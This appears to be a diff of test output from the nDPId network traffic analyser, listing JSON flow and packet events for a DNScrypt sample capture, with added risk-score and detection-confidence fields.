-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFypAAL0R8NAKAAABPtK0R8c8BB0CCLXvBycBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFytAAL0R8M8KAAABPtK0R82cBB0CCLXvByMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFyxAAL0R8M4KAAABPtK0R8FuBB0CCLXvByUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy0gAL0RDQ4KAAABPtK0R6rkBB0GBCq4ByYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy0Aub0RMeEKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy4gAL0RDQ0KAAABPtK0R+AzBB0GBPVqByQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA